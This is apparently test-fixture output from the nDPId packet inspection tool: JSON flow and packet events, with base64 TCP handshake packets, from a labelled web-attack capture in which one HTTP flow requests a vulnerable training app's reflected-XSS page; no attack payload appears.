+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6396,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_packet_id":1,"flow_last_seen":1499347734348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347734348,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gzpAAD4GQpasEAABwKgKMuvSAFDIKlelAAAAAKACchB9NgAAAgQFtAQCCAoBO9SfAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6397,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_packet_id":2,"flow_last_seen":1499347734348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347734348,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ69JCAHRCyCpXpqAScSAd2QAAAgQFtAQCCAoD5aYUATvUnwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6398,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_packet_id":3,"flow_last_seen":1499347734349,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347734349,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gztAAD4GQp2sEAABwKgKMuvSAFDIKlemQgB0Q4AQAOW83wAAAQEICgE71KAD5aYU"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6409,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347735664,"flow_last_seen":1499347735664,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347735664,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60384,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6409,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_packet_id":1,"flow_last_seen":1499347735664,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347735664,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QgpAAD4Gg8asEAABwKgKMuvgAFB2opfiAAAAAKACchCNKgAAAgQFtAQCCAoBO9XoAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6410,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_packet_id":2,"flow_last_seen":1499347735664,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347735664,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6+DN1JXXdqKX46AScSB\/GgAAAgQFtAQCCAoD5addATvV6AEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6411,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_packet_id":3,"flow_last_seen":1499347735665,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347735665,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QgtAAD4Gg82sEAABwKgKMuvgAFB2opfjzdSV2IAQAOUeIQAAAQEICgE71ekD5add"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6430,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347738229,"flow_last_seen":1499347738229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347738229,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60410,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6430,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_packet_id":1,"flow_last_seen":1499347738229,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347738229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bexAAD4GV+SsEAABwKgKMuv6AFCQibWGAAAAAKACchBTAwAAAgQFtAQCCAoBO9hqAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6431,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_packet_id":2,"flow_last_seen":1499347738229,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347738229,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6\/pIUQYXkIm1h6AScSBXtgAAAgQFtAQCCAoD5aneATvYagEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6432,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_packet_id":3,"flow_last_seen":1499347738229,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347738229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0be1AAD4GV+usEAABwKgKMuv6AFCQibWHSFEGGIAQAOX2vQAAAQEICgE72GoD5ane"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6442,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347739497,"flow_last_seen":1499347739497,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347739497,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60424,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6442,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_packet_id":1,"flow_last_seen":1499347739497,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347739497,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XjZAAD4GZ5qsEAABwKgKMuwIAFCYkYeRAAAAAKACchB3pQAAAgQFtAQCCAoBO9mnAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6443,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_packet_id":2,"flow_last_seen":1499347739497,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347739497,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7AiW6z+EmJGHkqAScSDzEwAAAgQFtAQCCAoD5asbATvZpwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6444,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_packet_id":3,"flow_last_seen":1499347739498,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347739498,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XjdAAD4GZ6GsEAABwKgKMuwIAFCYkYeSlus\/hYAQAOWSGwAAAQEICgE72acD5asb"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347740751,"flow_last_seen":1499347740751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740751,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60438,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":1,"flow_last_seen":1499347740751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347740751,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8V35AAD4GblKsEAABwKgKMuwWAFBKCo2eAAAAAKACchC+2AAAAgQFtAQCCAoBO9rgAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6455,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":2,"flow_last_seen":1499347740751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347740751,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7Bb1vAeUSgqNn6AScSASLAAAAgQFtAQCCAoD5axVATva4AEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6456,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":3,"flow_last_seen":1499347740752,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347740752,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0V39AAD4GblmsEAABwKgKMuwWAFBKCo2f9bwHlYAQAOWxMwAAAQEICgE72uAD5axV"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347606078,"flow_last_seen":1499347611787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58988,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347606078,"flow_last_seen":1499347611787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347607344,"flow_last_seen":1499347612785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59002,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347607344,"flow_last_seen":1499347612785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59002,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347608596,"flow_last_seen":1499347613787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59016,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347608596,"flow_last_seen":1499347613787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59016,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347612465,"flow_last_seen":1499347617785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59056,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347612465,"flow_last_seen":1499347617785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59056,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347613718,"flow_last_seen":1499347618787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59070,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347613718,"flow_last_seen":1499347618787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59070,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"finished","flow_packets_processed":315,"flow_first_seen":1499347547687,"flow_last_seen":1499347614979,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232682,"flow_avg_l4_payload_len":738,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6472,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347743331,"flow_last_seen":1499347743331,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347743331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6472,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":1,"flow_last_seen":1499347743331,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347743331,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iytAAD4GOqWsEAABwKgKMuwwAFCeqlZOAAAAAKACchCe6QAAAgQFtAQCCAoBO91lAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":2,"flow_last_seen":1499347743331,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347743331,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7DCbKjZEnqpWT6AScSAbmgAAAgQFtAQCCAoD5a7aATvdZQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6474,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":3,"flow_last_seen":1499347743332,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347743332,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iyxAAD4GOqysEAABwKgKMuwwAFCeqlZPmyo2RYAQAOW6oQAAAQEICgE73WUD5a7a"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6484,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347744595,"flow_last_seen":1499347744595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347744595,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60478,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6484,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":1,"flow_last_seen":1499347744595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347744595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iGtAAD4GPWWsEAABwKgKMuw+AFAw9lbKAAAAAKACchAK2AAAAgQFtAQCCAoBO96hAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6485,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":2,"flow_last_seen":1499347744595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347744595,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7D5E+wDpMPZWy6AScSAR1wAAAgQFtAQCCAoD5bAWATveoQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6486,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":3,"flow_last_seen":1499347744595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347744595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iGxAAD4GPWysEAABwKgKMuw+AFAw9lbLRPsA6oAQAOWw3gAAAQEICgE73qED5bAW"} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6505,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347743331,"flow_last_seen":1499347746913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347746913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347747187,"flow_last_seen":1499347747187,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347747187,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":1,"flow_last_seen":1499347747187,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347747187,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eZ5AAD4GTDKsEAABwKgKMuxYAFDkpJi3AAAAAKACchASmgAAAgQFtAQCCAoBO+EpAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":2,"flow_last_seen":1499347747187,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347747187,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7FgZ9EBx5KSYuKAScSACkAAAAgQFtAQCCAoD5bKeATvhKQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6511,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":3,"flow_last_seen":1499347747188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347747188,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eZ9AAD4GTDmsEAABwKgKMuxYAFDkpJi4GfRAcoAQAOWhlwAAAQEICgE74SkD5bKe"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6518,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347748472,"flow_last_seen":1499347748472,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347748472,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6518,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_packet_id":1,"flow_last_seen":1499347748472,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347748472,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8W1pAAD4GanasEAABwKgKMuxmAFDolLkwAAAAAKACchDs4QAAAgQFtAQCCAoBO+JqAAAAAAEDAwc="} 
